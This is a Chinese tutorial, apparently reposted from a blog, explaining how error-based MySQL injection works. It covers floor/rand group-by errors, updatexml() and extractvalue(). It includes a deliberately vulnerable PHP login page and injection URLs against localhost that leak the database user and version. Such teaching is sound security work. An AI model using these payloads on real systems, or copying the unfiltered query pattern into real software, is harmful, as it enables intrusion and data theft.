0x00 背景

　　SQL注入長期位于OWASP TOP10 榜首，對Web 安全有著很大的影響，黑客們往往在注入過程中根據錯誤回顯進行判斷，但是現在非常多的Web程序沒有正常的錯誤回顯，這樣就需要我們利用報錯注入的方式來進行SQL注入了。這篇文章會講解一下報錯注入的產生原理和利用案例。

0x01 十種報錯注入

　　這十種方式在這里不多講了，詳情移步https://www.cnblogs.com/wocalieshenmegui/p/5917967.html。平時我們最常用到的三種報錯注入方式分別是：floor()、updatexml()、extractvalue()。

0x02 報錯注入的原理

　　為了弄清報錯注入的原理，首先先創建了一個名為sqli的數據庫，然后建表插入數據：

mysql> create database sqli; mysql> create table user (id int(11) not null auto_increment primary key,name varchar(20) not null,pass varchar(32) not null);mysql> insert into user (name, pass) values ('admin', md5('admin')), ('guest', md5('guest'));

　　

　　我們先看一個基于floor()的報錯SQL語句：

select count(*),(concat(floor(rand(0)*2),(select version())))x from user group by x;

　　如果是第一次接觸報錯注入的話，一般會有這么幾個問題。

　　Q1.floor()函數是什么？

　　A1.floor函數的作用是返回小于等于該值的最大整數,也可以理解為向下取整，只保留整數部分。

　　Q2.rand(0)是什么意思？

　　A2.rand()函數可以用來生成0或1，但是rand(0)和rand()還是有本質區別的，rand(0)相當于給rand()函數傳遞了一個參數，然后rand()函數會根據0這個參數進行隨機數成成。rand()生成的數字是完全隨機的，而rand(0)是有規律的生成，我們可以在數據庫中嘗試一下。首先測試rand()

　　

　　我們再測試一下rand(0)的效果

　　

　　很顯然rand(0)是偽隨機的，有規律可循，這也是我們采用rand(0)進行報錯注入的原因，rand(0)是穩定的，這樣每次注入都會報錯，而rand()則需要碰運氣了，我們測試結果如下

　　

　　Q3.為什么會出現報錯？

　　A3.我們看一下報錯的內容：Duplicate entry '15.5.53' for key 'group_key'。意思是說group_key條目重復。我們使用group by進行分組查詢的時候，數據庫會生成一張虛擬表

　　

　　在這張虛擬表中，group by后面的字段作為主鍵，所以這張表中主鍵是name，這樣我們就基本弄清報錯的原因了，其原因主要是因為虛擬表的主鍵重復。按照MySQL的官方說法，group by要進行兩次運算，第一次是拿group by后面的字段值到虛擬表中去對比前，首先獲取group by后面的值；第二次是假設group by后面的字段的值在虛擬表中不存在，那就需要把它插入到虛擬表中，這里在插入時會進行第二次運算，由于rand函數存在一定的隨機性，所以第二次運算的結果可能與第一次運算的結果不一致，但是這個運算的結果可能在虛擬表中已經存在了，那么這時的插入必然導致主鍵的重復，進而引發錯誤。

0x03 案例

　　//以下案例代碼是抄的

　　數據庫可以繼續使用之前的數據庫，我們在Web根目錄下建立sqli.php

1 <?php 2 $conn = mysql_connect("localhost", "root", "123456"); // 連接數據庫，賬號root，密碼root 3 if (!$conn) { 4 die("Connection failed: " . mysql_error()); 5 } 6 7 mysql_select_db("sqli", $conn); 8 9 // verify login info 10 if (isset($_GET['name']) && isset($_GET['pass'])) { 11 $name = $_GET['name']; 12 $pass = md5($_GET['pass']); 13 14 $query = "select * from user where name='$name' and pass='$pass'"; 15 16 if ($result = mysql_query($query, $conn)) { 17 $row = mysql_fetch_array($result, MYSQL_ASSOC); 18 19 if ($row) { 20 echo "<script>alert('login successful!');</script>"; 21 } 22 } else { 23 die("Operation error: " . mysql_error()); 24 } 25 } 26 27 mysql_close(); 28 ?> 29 30 <!DOCTYPE html> 31 <html> 32 <head> 33 <title>Login</title> 34 </head> 35 <body> 36 <center> 37 <form method="get" action=""> 38 <label>Username:</label><input type="text" name="name" value=""/><br/> 39 <label>Password:</label><input type="password" name="pass" value=""/><br/> 40 <input type="submit" value="login"/> 41 </form> 42 </center> 43 </body> 44 </html>

　　在代碼的11-14行是登陸驗證模塊，可以看到程序以GET形式獲取了name和pass參數，沒有經過任何過濾直接帶入了查詢語句，這里明顯的存在SQL注入漏洞，我們用floor()報錯注入進行嘗試。

http://localhost/sqli.php?name=' or (select 1 from(select count(*),concat(user(),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a) # &pass=123

　　我們再分別用updatexml()和extractvalue()分別進行嘗試（原理各不相同，但是思路均是認為構造數據庫的錯誤）

?

http://localhost/sqli.php?name=' or extractvalue(1,concat(user(),0x7e,version())) # &pass=1 http://localhost/index.php?name=' or updatexml(1,concat(user(),0x7e,version()),1) # &pass=1

?

?

轉載于:https://www.cnblogs.com/richardlee97/p/10617115.html

總結

以上是生活随笔為你收集整理的SQL注入——报错注入的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。